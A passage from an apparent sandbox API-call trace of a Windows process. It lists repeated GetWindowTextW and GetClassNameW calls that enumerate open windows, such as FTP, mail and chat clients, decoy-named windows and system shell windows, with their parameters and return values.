lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="foxmailincmailwin") returned 17 [0121.210] GetWindowTextW (in: hWnd=0x102ec, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Trillian") returned 8 [0121.211] GetClassNameW (in: hWnd=0x102ec, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="trillian_wnd") returned 12 [0121.211] GetWindowTextW (in: hWnd=0x102ea, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Filezilla") returned 9 [0121.211] GetClassNameW (in: hWnd=0x102ea, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="filezillawin") returned 12 [0121.211] GetWindowTextW (in: hWnd=0x102e8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Fling") returned 5 [0121.211] GetClassNameW (in: hWnd=0x102e8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="fling") returned 5 [0121.211] GetWindowTextW (in: hWnd=0x102e4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Centralcreditcard") returned 17 [0121.211] GetClassNameW (in: hWnd=0x102e4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="centralcreditcardclass") returned 22 [0121.211] GetWindowTextW (in: hWnd=0x102dc, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Afr38") returned 5 [0121.212] GetClassNameW (in: hWnd=0x102dc, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="afr38_window") returned 12 [0121.212] GetWindowTextW (in: hWnd=0x102de, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Alftp") returned 5 [0121.212] GetClassNameW (in: hWnd=0x102de, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="alftp_class") returned 11 [0121.212] GetWindowTextW (in: hWnd=0x102d4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Leechftp") returned 8 [0121.212] GetClassNameW (in: hWnd=0x102d4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="leechftpcls") returned 11 [0121.212] GetWindowTextW (in: hWnd=0x102d0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Scriptftp") returned 9 [0121.213] GetClassNameW (in: hWnd=0x102d0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="scriptftpapp") returned 12 [0121.213] GetWindowTextW (in: hWnd=0x102cc, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Icq") returned 3 [0121.213] GetClassNameW (in: hWnd=0x102cc, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="icq_app") returned 7 [0121.213] GetWindowTextW (in: hWnd=0x102ce, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Skype") returned 5 [0121.213] GetClassNameW (in: hWnd=0x102ce, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="skype_window") returned 12 [0121.213] GetWindowTextW (in: hWnd=0x102d2, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Notepad") returned 7 [0121.213] GetClassNameW (in: hWnd=0x102d2, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="notepad_") returned 8 [0121.213] GetWindowTextW (in: hWnd=0x20214, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.213] GetClassNameW (in: hWnd=0x20214, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0121.214] GetWindowTextW (in: hWnd=0x1026c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Story Police") returned 12 [0121.214] GetClassNameW (in: hWnd=0x1026c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Storypoliceapp") returned 14 [0121.214] GetWindowTextW (in: hWnd=0x1026a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Include Effect Seven") returned 20 [0121.214] GetClassNameW (in: hWnd=0x1026a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="include_effect_seven_") returned 21 [0121.214] GetWindowTextW (in: hWnd=0x10268, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Serve") returned 5 [0121.214] GetClassNameW (in: hWnd=0x10268, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="servecls") returned 8 [0121.214] GetWindowTextW (in: hWnd=0x10260, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Weapon Natural") returned 14 [0121.215] GetClassNameW (in: hWnd=0x10260, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="weapon_Natural_win") returned 18 [0121.215] GetWindowTextW (in: hWnd=0x10266, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Camera") returned 6 [0121.215] GetClassNameW (in: hWnd=0x10266, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Camerawindow") returned 12 [0121.215] GetWindowTextW (in: hWnd=0x10262, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Nothing Foreign") returned 15 [0121.215] GetClassNameW (in: hWnd=0x10262, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="nothing_Foreign_app") returned 19 [0121.215] GetWindowTextW (in: hWnd=0x10264, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Move") returned 4 [0121.215] GetClassNameW (in: hWnd=0x10264, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="movecls") returned 7 [0121.216] GetWindowTextW (in: hWnd=0x40200, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Arrive") returned 6 [0121.216] GetClassNameW (in: hWnd=0x40200, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="arrivewnd") returned 9 [0121.216] GetWindowTextW (in: hWnd=0x1025c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Throw Toward Purpose") returned 20 [0121.216] GetClassNameW (in: hWnd=0x1025c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="throwTowardPurposeclass") returned 23 [0121.216] GetWindowTextW (in: hWnd=0x10244, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Factor Western Forget") returned 21 [0121.216] GetClassNameW (in: hWnd=0x10244, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="factor_Western_forget_window") returned 28 [0121.216] GetWindowTextW (in: hWnd=0x1022e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Clear") returned 5 [0121.216] GetClassNameW (in: hWnd=0x1022e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Clear_app") returned 9 [0121.216] GetWindowTextW (in: hWnd=0x10222, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Watch") returned 5 [0121.217] GetClassNameW (in: hWnd=0x10222, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Watch") returned 5 [0121.217] GetWindowTextW (in: hWnd=0x10230, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Who South") returned 9 [0121.217] GetClassNameW (in: hWnd=0x10230, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="whosouthapp") returned 11 [0121.217] GetWindowTextW (in: hWnd=0x10226, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Raise Left Buy") returned 14 [0121.217] GetClassNameW (in: hWnd=0x10226, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="raiseLeftbuyclass") returned 17 [0121.217] GetWindowTextW (in: hWnd=0x10218, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Knowledge Sign") returned 14 [0121.217] GetClassNameW (in: hWnd=0x10218, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Knowledgesignwin") returned 16 [0121.218] GetWindowTextW (in: hWnd=0x1020e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Drop") returned 4 [0121.218] GetClassNameW (in: hWnd=0x1020e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Dropwindow") returned 10 [0121.218] GetWindowTextW (in: hWnd=0x1020c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="That But") returned 8 [0121.218] GetClassNameW (in: hWnd=0x1020c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="that_but_class") returned 14 [0121.218] GetWindowTextW (in: hWnd=0x10206, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Claim") returned 5 [0121.219] GetClassNameW (in: hWnd=0x10206, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="claim_wnd") returned 9 [0121.219] GetWindowTextW (in: hWnd=0x10204, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Quite Do") returned 8 [0121.219] GetClassNameW (in: hWnd=0x10204, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Quite_Do_class") returned 14 [0121.219] GetWindowTextW (in: hWnd=0x30122, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.219] GetClassNameW (in: hWnd=0x30122, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.219] GetWindowTextW (in: hWnd=0x30036, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.219] GetClassNameW (in: hWnd=0x30036, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.220] GetWindowTextW (in: hWnd=0x3003e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.220] GetClassNameW (in: hWnd=0x3003e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.221] GetWindowTextW (in: hWnd=0x30070, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.221] GetClassNameW (in: hWnd=0x30070, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.221] GetWindowTextW (in: hWnd=0x201e0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0121.221] GetClassNameW (in: hWnd=0x201e0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0121.221] GetWindowTextW (in: hWnd=0x401f2, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.221] GetClassNameW (in: hWnd=0x401f2, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.221] GetWindowTextW (in: hWnd=0x30288, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.221] GetClassNameW (in: hWnd=0x30288, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.222] GetWindowTextW (in: hWnd=0x30126, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Blank Page - Internet Explorer") returned 30 [0121.222] GetClassNameW (in: hWnd=0x30126, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IEFrame") returned 7 [0121.222] GetWindowTextW (in: hWnd=0x2012c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.222] GetClassNameW (in: hWnd=0x2012c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="DDEMLEvent") returned 10 [0121.222] GetWindowTextW (in: hWnd=0x20084, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.222] GetClassNameW (in: hWnd=0x20084, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="DDEMLMom") returned 8 [0121.222] GetWindowTextW (in: hWnd=0x301fe, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.223] GetClassNameW (in: hWnd=0x301fe, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.223] GetWindowTextW (in: hWnd=0x201fa, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.223] GetClassNameW (in: hWnd=0x201fa, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.223] GetWindowTextW (in: hWnd=0x101be, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.223] GetClassNameW (in: hWnd=0x101be, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ATL:00007FFB1C177080") returned 20 [0121.224] GetWindowTextW (in: hWnd=0x101b8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.224] GetClassNameW (in: hWnd=0x101b8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.224] GetWindowTextW (in: hWnd=0x101aa, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Battery Meter") returned 13 [0121.224] GetClassNameW (in: hWnd=0x101aa, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="SystemTray_Main") returned 15 [0121.224] GetWindowTextW (in: hWnd=0x101a6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.225] GetClassNameW (in: hWnd=0x101a6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.225] GetWindowTextW (in: hWnd=0x101a4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0121.225] GetClassNameW (in: hWnd=0x101a4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0121.225] GetWindowTextW (in: hWnd=0x1018e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Task Host Window") returned 16 [0121.225] GetClassNameW (in: hWnd=0x1018e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0121.225] GetWindowTextW (in: hWnd=0x10110, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.226] GetClassNameW (in: hWnd=0x10110, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.226] GetWindowTextW (in: hWnd=0x10118, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.226] GetClassNameW (in: hWnd=0x10118, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="TabletModeCoverWindow") returned 21 [0121.226] GetWindowTextW (in: hWnd=0x20152, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.226] GetClassNameW (in: hWnd=0x20152, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.226] GetWindowTextW (in: hWnd=0x1019a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.227] GetClassNameW (in: hWnd=0x1019a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.227] GetWindowTextW (in: hWnd=0x10116, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.227] GetClassNameW (in: hWnd=0x10116, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="DummyDWMListenerWindow") returned 22 [0121.227] GetWindowTextW (in: hWnd=0x1010e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.227] GetClassNameW (in: hWnd=0x1010e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0121.227] GetWindowTextW (in: hWnd=0x100f4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.227] GetClassNameW (in: hWnd=0x100f4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.227] GetWindowTextW (in: hWnd=0x100f0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Windows Push Notifications Platform") returned 35 [0121.228] GetClassNameW (in: hWnd=0x100f0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="PushNotificationsPowerManagement") returned 32 [0121.228] GetWindowTextW (in: hWnd=0x100ee, lpString=0x7deed0, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0121.228] GetClassNameW (in: hWnd=0x100ee, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0121.228] GetWindowTextW (in: hWnd=0x100ea, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.228] GetClassNameW (in: hWnd=0x100ea, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ApplicationManager_DesktopShellWindow") returned 37 [0121.228] GetWindowTextW (in: hWnd=0x100e6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.229] GetClassNameW (in: hWnd=0x100e6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.229] GetWindowTextW (in: hWnd=0x100e4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.229] GetClassNameW (in: hWnd=0x100e4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.229] GetWindowTextW (in: hWnd=0x200da, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.229] GetClassNameW (in: hWnd=0x200da, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.229] GetWindowTextW (in: hWnd=0x100c0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.229] GetClassNameW (in: hWnd=0x100c0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.230] GetWindowTextW (in: hWnd=0x702b8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.230] GetClassNameW (in: hWnd=0x702b8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0121.230] GetWindowTextW (in: hWnd=0x20040, lpString=0x7deed0, nMaxCount=1024 | out: lpString="MS_WebcheckMonitor") returned 18 [0121.230] GetClassNameW (in: hWnd=0x20040, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0121.230] GetWindowTextW (in: hWnd=0x2001c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="BluetoothNotificationAreaIconWindowClass") returned 40 [0121.230] GetClassNameW (in: hWnd=0x2001c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0121.230] GetWindowTextW (in: hWnd=0x20030, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Windows Shell Experience Host") returned 29 [0121.231] GetClassNameW (in: hWnd=0x20030, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0121.231] GetWindowTextW (in: hWnd=0x2002e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.231] GetClassNameW (in: hWnd=0x2002e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="PNIHiddenWnd") returned 12 [0121.231] GetWindowTextW (in: hWnd=0x40038, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.231] GetClassNameW (in: hWnd=0x40038, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.231] GetWindowTextW (in: hWnd=0x101cc, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.231] GetClassNameW (in: hWnd=0x101cc, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.231] GetWindowTextW (in: hWnd=0x101c8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.231] GetClassNameW (in: hWnd=0x101c8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.232] GetWindowTextW (in: hWnd=0x100ac, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.232] GetClassNameW (in: hWnd=0x100ac, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0121.232] GetWindowTextW (in: hWnd=0x10078, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.232] GetClassNameW (in: hWnd=0x10078, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="DDEMLEvent") returned 10 [0121.232] GetWindowTextW (in: hWnd=0x10074, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.232] GetClassNameW (in: hWnd=0x10074, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="DDEMLMom") returned 8 [0121.232] GetWindowTextW (in: hWnd=0x10022, lpString=0x7deed0, nMaxCount=1024 | out: lpString="DWM Notification Window") returned 23 [0121.232] GetClassNameW (in: hWnd=0x10022, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Dwm") returned 3 [0121.232] GetWindowTextW (in: hWnd=0x2002a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.233] GetClassNameW (in: hWnd=0x2002a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="CicLoaderWndClass") returned 17 [0121.233] GetWindowTextW (in: hWnd=0x3035e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.233] GetClassNameW (in: hWnd=0x3035e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0121.233] GetWindowTextW (in: hWnd=0x100d0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Program Manager") returned 15 [0121.233] GetClassNameW (in: hWnd=0x100d0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Progman") returned 7 [0121.233] GetWindowTextW (in: hWnd=0x1012a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.233] GetClassNameW (in: hWnd=0x1012a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.233] GetWindowTextW (in: hWnd=0x100ce, lpString=0x7deed0, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0121.233] GetClassNameW (in: hWnd=0x100ce, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0121.234] GetWindowTextW (in: hWnd=0x10082, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.234] GetClassNameW (in: hWnd=0x10082, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.234] GetWindowTextW (in: hWnd=0xb031c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.234] GetClassNameW (in: hWnd=0xb031c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.234] GetWindowTextW (in: hWnd=0x601d6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.234] GetClassNameW (in: hWnd=0x601d6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.234] GetWindowTextW (in: hWnd=0x103a0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.234] GetClassNameW (in: hWnd=0x103a0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.234] GetWindowTextW (in: hWnd=0x1039e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.234] GetClassNameW (in: hWnd=0x1039e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.235] GetWindowTextW (in: hWnd=0x1039c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.235] GetClassNameW (in: hWnd=0x1039c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.235] GetWindowTextW (in: hWnd=0x1039a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.235] GetClassNameW (in: hWnd=0x1039a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.235] GetWindowTextW (in: hWnd=0x20224, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.235] GetClassNameW (in: hWnd=0x20224, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.235] GetWindowTextW (in: hWnd=0x10398, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.235] GetClassNameW (in: hWnd=0x10398, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.235] GetWindowTextW (in: hWnd=0x10394, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.236] GetClassNameW (in: hWnd=0x10394, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.236] GetWindowTextW (in: hWnd=0x10392, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.236] GetClassNameW (in: hWnd=0x10392, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.236] GetWindowTextW (in: hWnd=0x10390, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.236] GetClassNameW (in: hWnd=0x10390, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.236] GetWindowTextW (in: hWnd=0x10388, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.236] GetClassNameW (in: hWnd=0x10388, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.236] GetWindowTextW (in: hWnd=0x10386, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.237] GetClassNameW (in: hWnd=0x10386, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.237] GetWindowTextW (in: hWnd=0x10384, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.237] GetClassNameW (in: hWnd=0x10384, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.237] GetWindowTextW (in: hWnd=0x10382, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.237] GetClassNameW (in: hWnd=0x10382, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.237] GetWindowTextW (in: hWnd=0x2021a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.237] GetClassNameW (in: hWnd=0x2021a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.237] GetWindowTextW (in: hWnd=0x10380, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.238] GetClassNameW (in: hWnd=0x10380, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.238] GetWindowTextW (in: hWnd=0x1037e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.238] GetClassNameW (in: hWnd=0x1037e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.238] GetWindowTextW (in: hWnd=0x1037c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.238] GetClassNameW (in: hWnd=0x1037c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.238] GetWindowTextW (in: hWnd=0x1037a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.239] GetClassNameW (in: hWnd=0x1037a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.239] GetWindowTextW (in: hWnd=0x10378, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.239] GetClassNameW (in: hWnd=0x10378, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.239] GetWindowTextW (in: hWnd=0x10376, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.239] GetClassNameW (in: hWnd=0x10376, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.239] GetWindowTextW (in: hWnd=0x10374, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.239] GetClassNameW (in: hWnd=0x10374, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.239] GetWindowTextW (in: hWnd=0x10372, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.239] GetClassNameW (in: hWnd=0x10372, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.239] GetWindowTextW (in: hWnd=0x10370, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.240] GetClassNameW (in: hWnd=0x10370, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.240] GetWindowTextW (in: hWnd=0x1036e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.240] GetClassNameW (in: hWnd=0x1036e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.240] GetWindowTextW (in: hWnd=0x1036c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.240] GetClassNameW (in: hWnd=0x1036c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.240] GetWindowTextW (in: hWnd=0x10368, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.240] GetClassNameW (in: hWnd=0x10368, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.241] GetWindowTextW (in: hWnd=0x10362, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.241] GetClassNameW (in: hWnd=0x10362, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.241] GetWindowTextW (in: hWnd=0x10360, 